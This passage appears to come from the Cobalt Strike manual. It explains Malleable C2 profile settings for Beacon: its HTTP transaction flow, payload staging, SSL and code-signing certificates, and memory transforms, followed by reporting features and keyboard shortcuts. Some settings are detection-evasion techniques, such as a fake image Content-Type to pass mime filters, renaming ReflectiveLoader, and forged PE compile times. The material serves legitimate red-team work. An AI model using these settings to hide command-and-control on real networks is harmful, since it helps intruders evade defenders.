<td>0.0.0.0</td>
<td></td>
<td>IP address used to indicate no tasks are available to DNS Beacon</td>
</tr>
<tr>
<td>dns_sleep</td>
<td>0</td>
<td></td>
<td>Force a sleep prior to each individual DNS request. (in milliseconds)</td>
</tr>
<tr>
<td>dns_stager_subhost</td>
<td>.stage.123456.</td>
<td></td>
<td>Subdomain used by DNS TXT record stager.</td>
</tr>
<tr>
<td>hijack_remote_thread</td>
<td>true</td>
<td></td>
<td>Allow Beacon to run jobs by hijacking the primary thread of a suspended process</td>
</tr>
<tr>
<td>host_stage</td>
<td>true</td>
<td></td>
<td>Host payload for staging</td>
</tr>
</tbody>
</table>
With the uri option, you may specify multiple URIs as a space separated string. Cobalt Strike’s web server will bind all of these URIs and it will assign one of these URIs to each Beacon host when the Beacon stage is built.

Even though the useragent option exists; you may use the header statement to override this option.

12.4 A Beacon Transaction
To put all of this together, it helps to know what a Beacon transaction looks like and which data is sent with each request.

A transaction starts when a Beacon makes an HTTP GET request to Cobalt Strike’s web server. At this time, Beacon must send metadata that contains information about the compromised system.
Tip: session metadata is an encrypted blob of data. Without encoding, it is not suitable for transport in a header or URI parameter. Always apply a base64 or netbios statement to encode your metadata.

Cobalt Strike’s web server responds to this HTTP GET with tasks that the Beacon must execute. These tasks are, initially, sent as one encrypted binary blob. You may transform this information with the output keyword under the server context of http-get.

As Beacon executes its tasks, it accumulates output. After all tasks are complete, Beacon checks if there is output to send. If there is no output, Beacon goes to sleep. If there is output, Beacon initiates an HTTP POST transaction.

The HTTP POST request must contain a session id in a URI parameter or header. Cobalt Strike uses this information to associate the output with the right session. The posted content is, initially, an encrypted binary blob. You may transform this information with the output keyword under the client context of http-post.

Cobalt Strike’s web server may respond to an HTTP POST with anything it likes. Beacon does not consume or use this information. You may specify the output of HTTP POST with the output keyword under the server context of http-post.

Note: while http-get uses GET by default and http-post uses POST by default, you’re not stuck with these options. Use the verb option to change these defaults. There’s a lot of flexibility here.

This table summarizes these keywords and the data they send:

<table>
<thead>
<tr>
<th>Request</th>
<th>Component</th>
<th>Block</th>
<th>Data</th>
</tr>
</thead>
<tbody>
<tr>
<td>http-get</td>
<td>client</td>
<td>metadata</td>
<td>Session metadata</td>
</tr>
<tr>
<td>http-get</td>
<td>server</td>
<td>output</td>
<td>Beacon’s tasks</td>
</tr>
<tr>
<td>http-post</td>
<td>client</td>
<td>id</td>
<td>Session ID</td>
</tr>
<tr>
<td>http-post</td>
<td>client</td>
<td>output</td>
<td>Beacon’s responses</td>
</tr>
<tr>
<td>http-post</td>
<td>server</td>
<td>output</td>
<td>Empty</td>
</tr>
</tbody>
</table>

12.5 Payload Staging

Beacon is a staged payload. This means the payload is downloaded by a stager and injected into memory. Your http-get and http-post indicators will not take effect until Beacon is in memory on your target.

Malleable C2 gives you a few opportunities to customize the staging process though. The Beacon stager will use the global useragent option when it downloads the Beacon payload.

set useragent "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0";
You may specify arbitrary headers for the server side of the staging process too. This is useful if you need to change the Content-Type header to get past mime-type filtering.

```plaintext
http-stager {
    server {
        header "Content-Type" "image/gif";
    }
}
```

### 12.6 Self-signed SSL Certificates with SSL Beacon

The HTTPS Beacon uses the HTTP Beacon’s indicators in its communication. Malleable C2 profiles may also specify parameters for the Beacon C2 server's self-signed SSL certificate. This is useful if you want to replicate an actor with unique indicators in their SSL certificate:

```plaintext
https-certificate {
    set CN    "bobsmalware.com";
    set O     "Bob's Malware";
}
```

The certificate parameters under your profile's control are:

<table>
<thead>
<tr>
<th>Option</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>C</td>
<td>US</td>
<td>Country</td>
</tr>
<tr>
<td>CN</td>
<td>beacon.cobaltstrike.com</td>
<td>Common Name; Your callback domain</td>
</tr>
<tr>
<td>L</td>
<td>Washington</td>
<td>Locality</td>
</tr>
<tr>
<td>O</td>
<td>Strategic Cyber LLC</td>
<td>Organization Name</td>
</tr>
<tr>
<td>OU</td>
<td>Certificate Department</td>
<td>Organizational Unit Name</td>
</tr>
<tr>
<td>ST</td>
<td>DC</td>
<td>State or Province</td>
</tr>
<tr>
<td>validity</td>
<td>365</td>
<td>Number of days certificate is valid for</td>
</tr>
</tbody>
</table>

### 12.7 Valid SSL Certificates with SSL Beacon

You have the option to use a Valid SSL certificate with Beacon. Use a Malleable C2 profile to specify a Java Keystore file and a password for the keystore. This keystore must contain your certificate's private key, the root certificate, any intermediate certificates, and the domain certificate provided by your SSL certificate vendor. Cobalt Strike expects to find the Java Keystore file in the same folder as your Malleable C2 profile.

```plaintext
https-certificate {
    set keystore "domain.store";
    set password "mypassword";
}
```
The parameters to use a valid SSL certificate are:

<table>
<thead>
<tr>
<th>Option</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>keystore</td>
<td>domain.store</td>
<td>Java Keystore file with certificate information</td>
</tr>
<tr>
<td>password</td>
<td>mypassword</td>
<td>The password to your Java Keystore</td>
</tr>
</tbody>
</table>

Here are the steps to create a Valid SSL certificate for use with Cobalt Strike’s Beacon:

1. Use the keytool program to create a Java Keystore file. This program will ask “What is your first and last name?” Make sure you answer with the fully qualified domain name to your Beacon server. Also, make sure you take note of the keystore password. You will need it later.

   ```
   $ keytool -genkey -keyalg RSA -keysize 2048 -keystore domain.store
   ```

2. Use keytool to generate a Certificate Signing Request (CSR). You will submit this file to your SSL certificate vendor. They will verify that you are who you are and issue a certificate. Some vendors are easier and cheaper to deal with than others.

   ```
   $ keytool -certreq -keyalg RSA -file domain.csr -keystore domain.store
   ```

3. Import the Root and any Intermediate Certificates that your SSL vendor provides.

   ```
   $ keytool -import -trustcacerts -alias FILE -file FILE.crt -keystore domain.store
   ```

4. Finally, you must install your Domain Certificate.

   ```
   $ keytool -import -trustcacerts -alias mykey -file domain.crt -keystore domain.store
   ```

And, that’s it. You now have a Java Keystore file that’s ready to use with Cobalt Strike’s Beacon.

**12.8 Code Signing Certificate**

**Attacks -> Packages -> Windows Executable** and **Windows Executable (S)** give you the option to sign an executable or DLL file. To use this option, you must specify a Java Keystore file with your code signing certificate and private key. Cobalt Strike expects to find the Java Keystore file in the same folder as your Malleable C2 profile.

```
code-signer {
    set keystore "keystore.jks";
    set password "password";
    set alias "server";
}
```
The code signing certificate settings are:

<table>
<thead>
<tr>
<th>Option</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>alias</td>
<td>server</td>
<td>The keystore's alias for this certificate</td>
</tr>
<tr>
<td>digest_algorithm</td>
<td>SHA256</td>
<td>The digest algorithm</td>
</tr>
<tr>
<td>keystore</td>
<td>keystore.jks</td>
<td>Java Keystore file with certificate information</td>
</tr>
<tr>
<td>password</td>
<td>mypassword</td>
<td>The password to your Java Keystore</td>
</tr>
<tr>
<td>timestamp</td>
<td>false</td>
<td>Timestamp the file using a third-party service</td>
</tr>
<tr>
<td>timestamp_url</td>
<td><a href="http://timestamp.digicert.com">http://timestamp.digicert.com</a></td>
<td>URL of the timestamp service</td>
</tr>
</tbody>
</table>

**12.9 Memory Indicators**

The stage block in Malleable C2 profiles influence aspects of how Beacon sits in memory.

```python
stage {
    set userwx "false";
    set compile_time "14 Jul 2009 8:14:00";
    set image_size_x86 "512000";
    set image_size_x64 "512000";

    transform-x86 {
        prepend "\x90\x90";
        strrep "ReflectiveLoader" "DoLegitStuff";
    }

    transform-x64 {
        # transform the x64 rDLL stage
    }
}
```

The `transform-x86` and `transform-x64` blocks pad and transform Beacon's Reflective DLL stage. These blocks support three commands: prepend, append, and `strrep`.

The `prepend` command inserts a string before Beacon's Reflective DLL. The `append` command adds a string after the Beacon Reflective DLL. Make sure that prepended data is valid code for the stage’s architecture (x86, x64). The `c2lint` program does not have a check for this. The `strrep` command replaces a string within Beacon’s Reflective DLL.

Here are the stage block options:

<table>
<thead>
<tr>
<th>Option</th>
<th>Example</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td>compile_time</td>
<td>14 July 2009 8:14:00</td>
<td>The build time in Beacon’s PE header</td>
</tr>
<tr>
<td>image_size_x64</td>
<td>512000</td>
<td>SizeOfImage value in x64 Beacon’s PE header</td>
</tr>
<tr>
<td>image_size_x86</td>
<td>512000</td>
<td>SizeOfImage value in x86 Beacon’s PE header</td>
</tr>
<tr>
<td>userwx</td>
<td>false</td>
<td>Ask ReflectiveLoader to use or avoid RWX permissions for Beacon DLL in memory</td>
</tr>
</tbody>
</table>
12.10 Which is more dangerous, Malleable C2 or a swimming pool?
The answer? Both. Malleable C2 gives you a new level of control over your network and host indicators. With this power also comes responsibility. Malleable C2 is an opportunity to make a lot of mistakes too. Here are a few things to think about when you customize your profiles:

1. Each Cobalt Strike instance uses one profile at a time. If you change a profile or load a new profile, previously deployed Beacons cannot communicate with you.

2. Always stay aware of the state of your data and what a protocol will allow when you develop a data transform. For example, if you base64 encode metadata and store it in a URI parameter—it’s not going to work. Why? Some base64 characters (+, =, and /) have special meaning in a URL. The c2lint tool and Profile Compiler will not detect these types of problems.

3. Always test your profiles, even after small changes. If Beacon can’t communicate with you, it’s probably an issue with your profile. Edit it and try again.

4. Trust the c2lint tool. This tool goes above and beyond the profile compiler. The checks are grounded in how this technology is implemented. If a c2lint check fails, it means there is a real problem with your profile.
13. Reporting and Logging

13.1 Logging
Cobalt Strike logs all of its activity on the team server. These logs are located in the logs folder in the same directory you started your team server from. All Beacon activity is logged here with a date and timestamp.

13.2 Reports
Cobalt Strike has several report options to help make sense of your data and convey a story to your clients. You may configure the title, description, and hosts displayed in most reports.

Figure 42. Export Report Dialog

Go to the Reporting menu and choose one of the reports to generate. Cobalt Strike will export your report as an MS Word or PDF document.

Activity Report
The activity report provides a timeline of red team activities. Each of your post-exploitation activities are documented here.
Hosts Report
The hosts report summarizes information collected by Cobalt Strike on a host-by-host basis. Services, credentials, and sessions are listed here as well.

Indicators of Compromise
This report summarizes various indicators of compromise to include which domains you used and all of the MD5 hashes for files you’ve uploaded. This report also provides a “sample” of Cobalt Strike traffic based on your Malleable C2 profile. This information is provided without context and it’s meant to resemble the technical appendix of a threat intelligence report.
Figure 4. Sample Traffic in the Indicators of Compromise Report

Sessions Report
This report documents indicators and activity on a session-by-session basis. This report includes: the communication path each session used to reach you, MD5 hashes of files put on disk during that session, miscellaneous indicators (e.g., service names), and a timeline of post-exploitation activity. This report is a fantastic tool to help a network defense team understand all of red’s activity and match their sensors to your activity.
Social Engineering
The social engineering report documents each round of spear phishing emails, who clicked, and what was collected from each user that clicked. This report also shows applications discovered by the system profiler.

13.3 Custom Logo in Reports
Cobalt Strike reports display a Cobalt Strike logo at the top of the first page. You may replace this with an image of your choosing. Go to Cobalt Strike -> Preferences -> Reporting to set this

Your custom image should be 1192x257px set to 300dpi. The 300dpi setting is necessary for the reporting engine to render your image at the right size.

You may also set an accent color. This accent color is the color of the thick line below your image on the first page of the report. Links inside reports use the accent color too.
Vulnerability Report

August 14, 2012
This report shows vulnerabilities found during this penetration test.

Summary

Vulnerabilities: 3
Unique Vulnerabilities: 2
Vulnerable Hosts: 2
Compromises: 6

Figure 46. A Customized Report

13.4 Custom Reports
Cobalt Strike 3.0 supports custom reports. These scripts are defined in a subset of the Aggressor Script language. Consulting the Aggressor Script documentation to learn more about this feature:

- https://www.cobaltstrike.com/aggressor-script
Appendix A. Keyboard Shortcuts
The following keyboard shortcuts are available to make your use of Cobalt Strike more efficient.

<table>
<thead>
<tr>
<th>Shortcut</th>
<th>Where</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td>Ctrl+A</td>
<td>console</td>
<td>select all text</td>
</tr>
<tr>
<td>Ctrl+F</td>
<td>console</td>
<td>open find tool to search the console</td>
</tr>
<tr>
<td>Ctrl+Minus</td>
<td>console</td>
<td>decrease font size</td>
</tr>
<tr>
<td>Ctrl+Plus</td>
<td>console</td>
<td>increase font size</td>
</tr>
<tr>
<td>Ctrl+0</td>
<td>console</td>
<td>reset font size</td>
</tr>
<tr>
<td>Down</td>
<td>console</td>
<td>show next command in command history</td>
</tr>
<tr>
<td>Escape</td>
<td>console</td>
<td>clear edit box</td>
</tr>
<tr>
<td>Page Down</td>
<td>console</td>
<td>scroll down half a screen</td>
</tr>
<tr>
<td>Page Up</td>
<td>console</td>
<td>scroll up half a screen</td>
</tr>
<tr>
<td>Tab</td>
<td>console</td>
<td>complete the current command (in some console types)</td>
</tr>
<tr>
<td>Up</td>
<td>console</td>
<td>show previous command in command history</td>
</tr>
<tr>
<td>Ctrl+B</td>
<td>everywhere</td>
<td>send current tab to the bottom of the Cobalt Strike window</td>
</tr>
<tr>
<td>Ctrl+D</td>
<td>everywhere</td>
<td>close current tab</td>
</tr>
<tr>
<td>Ctrl+Shift+D</td>
<td>everywhere</td>
<td>close all tabs except the current tab</td>
</tr>
<tr>
<td>Ctrl+E</td>
<td>everywhere</td>
<td>empty the bottom of the Cobalt Strike window (undo Ctrl+B)</td>
</tr>
<tr>
<td>Ctrl+I</td>
<td>everywhere</td>
<td>choose a session to interact with</td>
</tr>
<tr>
<td>Ctrl+Left</td>
<td>everywhere</td>
<td>switch to previous tab</td>
</tr>
<tr>
<td>Ctrl+O</td>
<td>everywhere</td>
<td>open preferences</td>
</tr>
<tr>
<td>Ctrl+Right</td>
<td>everywhere</td>
<td>switch to next tab</td>
</tr>
<tr>
<td>Ctrl+T</td>
<td>everywhere</td>
<td>take screenshot of current tab (result is sent to team server)</td>
</tr>
<tr>
<td>Ctrl+Shift+T</td>
<td>everywhere</td>
<td>take screenshot of Cobalt Strike (result is sent to team server)</td>
</tr>
<tr>
<td>Ctrl+W</td>
<td>everywhere</td>
<td>open current tab in its own window</td>
</tr>
<tr>
<td>Ctrl+C</td>
<td>graph</td>
<td>arrange sessions in a circle</td>
</tr>
<tr>
<td>Ctrl+H</td>
<td>graph</td>
<td>arrange sessions in a hierarchy</td>
</tr>
<tr>
<td>Ctrl+Minus</td>
<td>graph</td>
<td>zoom out</td>
</tr>
<tr>
<td>Ctrl+P</td>
<td>graph</td>
<td>save a picture of the graph display</td>
</tr>
<tr>
<td>Ctrl+Plus</td>
<td>graph</td>
<td>zoom in</td>
</tr>
<tr>
<td>Ctrl+S</td>
<td>graph</td>
<td>arrange sessions in a stack</td>
</tr>
<tr>
<td>Ctrl+0</td>
<td>graph</td>
<td>reset to default zoom-level</td>
</tr>
<tr>
<td>Ctrl+F</td>
<td>tables</td>
<td>open find tool to filter table content</td>
</tr>
<tr>
<td>Ctrl+A</td>
<td>targets</td>
<td>select all hosts</td>
</tr>
<tr>
<td>Escape</td>
<td>targets</td>
<td>clear selected hosts</td>
</tr>
</tbody>
</table>